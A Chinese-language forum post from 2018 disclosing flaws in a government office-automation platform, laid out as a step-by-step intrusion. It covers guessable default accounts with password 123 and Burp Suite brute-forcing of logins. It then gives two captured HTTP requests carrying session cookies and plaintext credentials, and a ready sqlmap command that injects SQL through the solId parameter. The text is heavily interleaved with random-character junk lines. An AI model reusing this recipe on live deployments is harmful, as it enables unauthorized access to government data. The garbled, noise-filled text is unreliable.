|
3 f* s5 p0 G$ Z. }% j1 H( ~
5 Q$ K* ?/ e( ^% @
: `$ r' D$ Q' B, }; n
; o/ n. U" y6 x1 Y9 P 平台简介:, c- U1 K2 c) k% O3 J' C# ?
- {8 m& L8 O$ r6 L# p9 {
1 ]/ b9 z: y6 w F9 t/ C" E4 E% v
- _! {3 _1 Z ^3 O. }, {* x
) } l5 c0 T( E( F# h1 F# k# F" q6 Z1 q4 ^ V
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
3 o% j' W: S7 M8 h+ a3 G/ f同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 B; B$ p1 O4 {% o
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!! M- ^3 d. b( c/ z! o) A) j
) V! m- ]* ]* ?- q# r* E2 k( X5 Z$ k) s5 y$ B2 j* H& P2 H1 D4 i5 m
: I- Q: y" `" B
9 q2 B, _: J- \7 d4 b% f _7 ?1 m4 ^- a p7 I+ s
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:( Z7 J- M4 {; E$ D/ o( X3 x
# `# ], p+ u& g8 A4 E8 Y
. f1 k- \" u/ A4 v7 u5 T7 I
) e0 B$ R4 S: p3 }. A; n8 E* A ( E5 I% R) y: H$ o
6 D+ G9 K" p7 U3 X- u# }
http://1.1.1.1:7197/cap-aco/#(案例2-)+ a5 C( q# u/ u* n
' s0 V- ^1 F2 q4 L& S
% p8 [) n, D2 B- n http://www.XXOO.com (案例1-官网网站)
- r F. M' L# h7 o& s" l
* G$ x7 f1 R! q+ e" u% J) B# [, B( S/ a, P4 w4 {& F
9 a( ^: ]3 K5 _1 H) W# k: L, a* X
8 I+ E/ M6 f2 {. o, r( B
\3 T0 B$ ]6 s% {' m; } 漏洞详情:% |7 K- r+ M. z" w+ E" E4 E6 \
- L6 \, ^3 i% W8 \- F
1 l: S) w1 @- S- B5 D4 u8 v+ `0 m 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试0 Q3 v8 N7 u4 X9 N
: ]2 D0 u1 V+ Z) A8 O. Q, Y0 G# D% ?( p5 s
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
0 ^, Z5 A$ ~4 E& \2 O
3 A- `# [7 y- P9 Z, M+ U) f( G. l$ A; o- W# }/ E
0 j2 c8 s7 d+ b; U ! ^' z6 h1 d8 x
9 W" V7 s8 K, h1 F2 V( w% l
( L& K! ~ ~3 A3 V) W; ^ + }: M8 m/ K7 n) l: o
9 E) p6 Q3 e( u0 h% G8 ` status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
0 U$ i0 H9 I- ~, u# J 0 ]5 S {) a9 d% {# ^
7 P3 b+ D0 m# |1 Q( Q, ? 1、案例1-官方网站
1 L6 L5 M- y, \" i" T' F3 B" c # Y2 G- Q D6 z k6 p
- x% I7 b( h$ k7 r GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
" v9 ]& x9 j% r- J, H1 ^0 S) Q 7 ` H* O' H+ G" u( k
: E5 R: ^* l5 S$ E V Host: www.XXOO.com
9 i1 f0 K n C9 X' e 1 q' N Y7 Q( x% } p/ J$ }
{3 {+ h/ l2 }
Proxy-Connection: Keep-Alive2 b0 o5 E6 p1 @4 F w2 F
) o2 G' |2 {/ n# h8 Y3 V6 L
9 N1 `2 _" j6 i; @4 p3 W
Accept: application/json, text/javascript, */*; q=0.01
& E# ^% k- z \5 L
( b$ {/ M s* }7 P1 Q) |
0 D7 R5 w/ O' E6 E! r1 V+ I Accept-Language: zh-CN5 E" s) w z5 G# U+ }
* ?- w/ h, x: w# \+ j+ j* i
6 ]/ C3 {" x1 w% m8 `4 y
Content-Type: application/json
4 _) v0 k, `3 D" K ' W+ l; f/ }9 i$ Y+ k. h! p
% t" Q: ]$ |: d! l User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
$ R& V; B; {8 ~5 E! C- P
) L& u. S% A8 Q3 _, L! C- n
4 i2 q T* Z' T* ~$ F1 F1 z X-Requested-With: XMLHttpRequest
" h- y' m* q! p * n6 V# {6 D7 N0 S) g9 l
, V, M* j/ v5 K$ t1 G# C8 ? Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
8 I! H: @% I" I L4 u 1 K+ A* D9 x) k- i9 C$ ?1 N, r( q" x
% r; t4 z7 M8 w9 X$ y% @* Q
Accept-Encoding: gzip, deflate, sdch. h! n" }0 e- o( }3 c
( I' a! w. A, O+ D- o3 |% A
# q6 @* n- D5 d% L$ l Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
: n5 V, f9 q* t1 p2 V1 \. ^: u * q; }$ [; e }
3 i# K* }. }1 G$ i5 `9 n4 o 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:0 a, _- T" U' ?4 @; R: J
|, w( W7 ?6 G6 b& m' P6 J
7 n8 }8 N1 t/ u1 l/ O 
$ t% F. k/ i, v z! R: O( }. Q1 r # e% H3 G$ V* E- t
+ g3 E8 t8 W4 Z& \
 ) _$ j B( x2 `; D$ d
( e6 t2 E0 D# S2 B1 V G7 I# F+ o& E- f7 V$ g; G4 i( J
+ R5 B9 B9 o, q0 ~# F
, C) w8 e7 ?3 {0 d* ]0 J
% A% n0 Z# |) F) O1 [
5 [0 p) Y* q0 r7 W: s
' p0 X% l. I7 o, ~) E
$ u, f$ ` m0 ]3 W n! ^* H6 P: p8 }
! e* f, R* ^) J A: [! ^ n% l6 r
7 @) ~+ }6 S& k8 u0 P# G, {1 }4 Y2 z, u! O: z3 X9 {0 _: B
2、案例2-某天河云平台3 Z1 x) @) X5 \4 [( [
, ^8 e9 p) ^ f& e: v
$ s! Y- |" K4 f" v, b x
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
6 B, q1 D9 m3 o" {1 _3 b/ u8 y. k
( S( C% g b8 x2 K- S5 S% ?& T4 I3 u- g
Host: 1.1.1.:7197+ p1 [ o8 v3 f5 L( U8 N: C, P
# @0 E* v0 h# {
4 a! y; W. |- \( j5 Z' n" C8 U/ \
Accept: application/json, text/javascript, */*; q=0.01: m1 |5 q& w6 X
8 m9 o D' g+ l
2 v2 s' k9 S( B1 M8 T X-Requested-With: XMLHttpRequest1 l1 k; Y* [6 d. L. h
$ c# E9 I# Z7 h1 r6 x
; l+ n: x# W/ \. b, ]2 T7 k User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 h s+ y+ Q- D( _3 u: Q8 v( X
4 e2 a. H/ c( s3 ?
- d% M% v2 U1 j6 K# M; x; ` Content-Type: application/json
/ ^( M% G) i* Z$ c* \# h2 t- Q2 M
. B( n3 O: z+ I: y- ^7 B
+ k$ _9 A0 U' ^9 N! |! \/ x Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
* R- A3 n2 v( C
3 u( e) L+ Z3 [( i4 d( }
# ^; S8 D9 Q& l9 }3 j0 D$ b1 F Accept-Language: zh-CN,zh;q=0.8
) y# t6 \* M8 w$ U + a( B( \' ~& W- l& Y
9 F% d. M5 D* u3 m
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=19 [9 B& i ^+ t) O# |" B
6 G/ B( L: P$ Y
( a7 v! @) \* @1 O: t1 E$ }4 \
Connection: close7 g: N% R' `: g$ H6 _
2 r. R- T* K# `" c
6 G. P/ J7 v& Q; A! I, Z
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
$ `7 v2 ]' e( i: ^
' R$ a% X9 @& M3 N4 D7 D1 T& z$ @2 G& V
 2 r- W; w5 x9 C# y
) k2 E1 Y* s# E1 R6 s- @5 w( _
5 y5 K6 p; @: p" d" X N; z
! C) v# L z5 m- N$ O0 s @* N
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对